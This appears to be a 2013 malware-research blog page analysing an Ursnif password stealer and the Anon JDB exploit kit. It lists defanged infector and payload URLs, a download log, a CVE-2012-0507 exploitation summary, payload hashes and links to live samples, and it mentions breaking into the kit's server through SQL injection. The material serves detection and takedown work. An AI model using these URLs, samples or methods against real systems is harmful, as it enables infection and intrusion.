.rdata:100128A4 0000001B C .set DiskDirectory1=\"%s\"\r\n  
.rdata:100128C0 00000019 C .set CabinetName1=\"%s\"\r\n    
.rdata:100128DC 00000007 C \"%s\"\r\n                      
.rdata:100128EC 0000001B C .set DestinationDir=\"%S\"\r\n  
.rdata:1001290C 00000007 C \"%S\"\r\n                      
And making CAB archive of the target.. 
.rdata:10012914 00000014 C makecab.exe /F \"%s\
I thank you @EP_X0FF kernel mode for the very good help solving this mistery. It is a PWS variant alright, with the malware name of Trojan Ursnif.The complete list of the .RDATA section is here-->>[HERE] 
Samples
*) We share samples for research purpose & raising detection ratio of this infection. Infection sample set -->>[HERE]The malware complete recorded process can be download in archive here -->>[HERE] Thank's to @kafeine for the infection info.  

#MalwareMustDie!

Read More

Peeking at Anon JDB Exploit Kit JAR infectors (212,7,192,100/jdb/lib/java/lives/xxx) - Story continues, many more Payloads came up!

This is the continuation of the previous post of peeling up Anon JDB Exploit Kit.
You can read the previous post writtent in here -->>[HERE]

We learned a lot from this EK's  landing page infection scheme in previous post,
but we couldn't fetch the JAR well, we missed the exploitation scheme of this EK, 
I won't give up, after digging & praying, bumping to nonsense here and there,
we were contacted by the fellow VirusTotal researcher @cyberup, 
with the very good advice about Anon JDB EK's Jar, I shared below:
That AnonJDB is first of all very vulnerable to sql, 
so with permission from the owner its easy to get their DB and files 
to see whats what.
↑Indeed a crusader prayers' were answered, a light from God,
with gratitude I hurried following the tips and re-wacked the
exploit servers and getting these JAR with ...a bunch of NEW PAYLOADS!

Kindly allow me to explain the exploit and the payload details as 
per below:

The relation between Anon JDB Exploit Kit's JAR and Payload
First of all, JDB exploit Kit is using infection ID in MD5 hashed,
If we got the right hash then we will know the jar and the payload.
By understanding this and using the advice above we figured the path
of the JAR and how it links to payload like following example:
Say, the hash is "xxxx1234" 
Then the jar will be at [INFECTOR-DOMAIN]/jdb/lib/java/lives/xxxx1234
with the payload URL of [INFECTOR-DOMAIN]/jdb/lib/load.php?id=xxxx1234
In our case, the JAR files download URL is as per follows:
h00p://212,7,192,100/jdb/lib/java/lives/000316fe5ab4f8c78ff2ea65fd2d9656.jar
h00p://212,7,192,100/jdb/lib/java/lives/00810c54efd040c1491d1ef9c53736a8.jar
h00p://212,7,192,100/jdb/lib/java/lives/35b1ae64e88f3cab77c8beb9b00b6764.jar
h00p://212,7,192,100/jdb/lib/java/lives/39fcb841479cb7e82f645399116c48f2.jar
h00p://212,7,192,100/jdb/lib/java/lives/47a37dc86aab9c56f0d03f1ea22fa352.jar
h00p://212,7,192,100/jdb/lib/java/lives/689cfedf4da4270a472b7e6ee0eab835.jar
h00p://212,7,192,100/jdb/lib/java/lives/8992af86e38418612bd4c09aac40e180.jar
h00p://212,7,192,100/jdb/lib/java/lives/a9d1c1325864c7679519247fb1c2757d.jar
h00p://212,7,192,100/jdb/lib/java/lives/c9f667dfe828de36d7c10491d408838b.jar
h00p://212,7,192,100/jdb/lib/java/lives/d9f9133fb120cd6096870bc2b496805b.jar
h00p://212,7,192,100/jdb/lib/java/lives/e686d160e88d62ca8f8d4f2780f0b64d.jar
h00p://212,7,192,100/jdb/lib/java/lives/ef00ab8fca7d43c1ade8c391dd5e845d.jar
While the related payload is as per follows:
h00p://212,7,192,100/jdb/lib/load.php?id=000316fe5ab4f8c78ff2ea65fd2d9656
h00p://212,7,192,100/jdb/lib/load.php?id=00810c54efd040c1491d1ef9c53736a8
h00p://212,7,192,100/jdb/lib/load.php?id=35b1ae64e88f3cab77c8beb9b00b6764 
(No Data)
h00p://212,7,192,100/jdb/lib/load.php?id=47a37dc86aab9c56f0d03f1ea22fa352
h00p://212,7,192,100/jdb/lib/load.php?id=689cfedf4da4270a472b7e6ee0eab835
h00p://212,7,192,100/jdb/lib/load.php?id=8992af86e38418612bd4c09aac40e180
h00p://212,7,192,100/jdb/lib/load.php?id=a9d1c1325864c7679519247fb1c2757d
h00p://212,7,192,100/jdb/lib/load.php?id=c9f667dfe828de36d7c10491d408838b
h00p://212,7,192,100/jdb/lib/load.php?id=d9f9133fb120cd6096870bc2b496805b
h00p://212,7,192,100/jdb/lib/load.php?id=e686d160e88d62ca8f8d4f2780f0b64d
(No Data)
*)No Data = The JAR wasn't contained the payload downloadable URL.

the JAR files
So we have fetched the JAR with the below snip response logs:
   : 
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sat, 02 Feb 2013 06:37:30 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 27 Jan 2013 11:58:55 GMT
ETag: "cf0522-f99-e2835dc0"
Accept-Ranges: bytes
Content-Length: 3993
Connection: close
Content-Type: application/x-java-archive
200 OK
Length: 3993 (3.9K) [application/x-java-archive]
Saving to: `00810c54efd040c1491d1ef9c53736a8.jar'
2013-02-02 15:36:52 (57.0 MB/s) - `00810c54efd040c1491d1ef9c53736a8.jar' saved [3993/3993]
Nothing "fancy" in fetching them and, yes, we got them all : This is what will happen if you access the JAR directly from the firefox:  
Exploit & infection method used in the JARs
I will explain it step by step, this is going to be a bit long, so pls bear with these details. 
The JARs and the list of CVE exploitation used + Payload names: ---------------------------------------------------------------- 000316fe5ab4f8c78ff2ea65fd2d9656.jar  CVE-2012-0507 (java.exe)  00810c54efd040c1491d1ef9c53736a8.jar  CVE-2012-0507 (Flash.exe) 35b1ae64e88f3cab77c8beb9b00b6764.jar  CVE-2012-0507 (hwid.exe) 39fcb841479cb7e82f645399116c48f2.jar  XXXXX         (XXXXX)  47a37dc86aab9c56f0d03f1ea22fa352.jar  CVE-2012-0507 (XXX 0byte/sexecam.exe ) 689cfedf4da4270a472b7e6ee0eab835.jar  CVE-2012-0507 (javaupdate.exe) 8992af86e38418612bd4c09aac40e180.jar  CVE-2012-0507 (file.exe /a downloader script) a9d1c1325864c7679519247fb1c2757d.jar  CVE-2012-0507 (AdobeFlash.exe)    c9f667dfe828de36d7c10491d408838b.jar  CVE-2012-0507 (host.exe /a downloader script) d9f9133fb120cd6096870bc2b496805b.jar  CVE-2012-0507 (sdsf.exe) e686d160e88d62ca8f8d4f2780f0b64d.jar  CVE-2012-0507 (eafaeeef.exe) ef00ab8fca7d43c1ade8c391dd5e845d.jar  XXXXX         (XXXXX)
 
PoC of CVE-2012-0507 used:
The summary is: by using the BufferedOutputStream flooded with writing arrays  of Bytes the JAR is exploiting the Java Runtime Environment to gain privilege to execute the download and calling the LocalRunTime.Exec() to run the malware.  The BufferedOutputStream/CVE-2012-0507 traces: Exploit Methods:  
PoC of Infection traces:
The download URL, path to save the payload & payload's execution calls + URL reference: You'll be linked also to a malware related URL upon success exploitation (in the sample below is http:// or undefined) like the sample below: ↑See the purpple mark of the reference URL.  
PoC of all the JAR + Download URL + Payload snapshot
All of the JAR detected in this AnonJDB EK Servers are using the same exploit & infection method as per below. I detected 7(seven) PE payload malware, 2(two) - payloads of HTML w/JavaScript of OTHER malware downloader, with 2 inactive JARS + 1 unavailable payloads. Including the previous post's sample the Total are  13(thirteen) scheme of infection within one IP of 212,7,192,100 Below is the snapshot of the infector code used one by one:  000316fe5ab4f8c78ff2ea65fd2d9656.jar  00810c54efd040c1491d1ef9c53736a8.jar  35b1ae64e88f3cab77c8beb9b00b6764.jar  39fcb841479cb7e82f645399116c48f2.jar ((received 0byte file download))  689cfedf4da4270a472b7e6ee0eab835.jar  8992af86e38418612bd4c09aac40e180.jar  a9d1c1325864c7679519247fb1c2757d.jar  c9f667dfe828de36d7c10491d408838b.jar  d9f9133fb120cd6096870bc2b496805b.jar  e686d160e88d62ca8f8d4f2780f0b64d.jar  
Conclusion:
1. With this post herewith we conclude the research of Anon JDB Exploit Kit. 2. So many scheme of infection of fake updater/fake site that can be used by     this Exploit Kit  3. The usage of sql database is making AnonJDB can provide many infection scheme 4. We need to shutdown 212,7,192,100 infector right away, this post can be used     as evidence.
 
Samples
For the research purpose & raising the detection ratio of these malwares, I hereby sharing the samples (JARs + payloads) here -->>[HERE] Payloads MD5 details: 
2013/02/02  16:40    842,955 AdobeFlash.exe  5ae6434a9c00f57db6b8d80a0e07d551 2013/02/02  17:07    257,536 eafaeeef.exe    434cb440d3960e3dc5dc5e5762cf641f 2013/02/02  16:28     17,534 file.exe        510e954ee7fd8542ba38a12e73aa8dad 2013/02/02  15:41    363,008 Flash.exe       fd1f42ec224f16d4586d3e807aea65d3 2013/02/02  16:51     67,805 host.exe        c2706e1ee737fc9e5f5a05f3def5af93 2013/02/02  16:02     10,240 hwid.exe        44fef11ca8263ec8ff2879d492d8fb4c 2013/02/02  15:40    503,296 java.exe        521f94e1bf48d808cd02550c9dbcf976 2013/02/02  16:18    429,048 javaupdate.exe  440a5a869cb42ca95dc39524f7627217 2013/02/02  17:00  1,798,085 sdsf.exe        92f03b79b265b6cb10e11c19a3462bbb
Virus Total (with some new payloads with poor) Detection Ratio: 
AdobeFlash.exe  (17/46) -->>[VT-Result]eafaeeef.exe    (42/46) -->>[VT-Result]file.exe        (0/46)  -->>[VT-Result]Flash.exe       (13/46) -->>[VT-Result]host.exe        (0/46)  -->>[VT-Result]hwid.exe        (4/46)  -->>[VT-Result]java.exe        (7/46)  -->>[VT-Result]javaupdate.exe  (5/44)  -->>[VT-Result]sdsf.exe        (5/46)  -->>[VT-Result]
@anonymouspress @anonymousirc @anonops So, you guys making Exploit Kit now? Is this yours?→ malwaremustdie.blogspot.jp/2013/02/peekin… Confirm this please. #RAGE
— Malware Crusaders (@MalwareMustDie) February 2, 2013

#MalwareMustDie!

Read More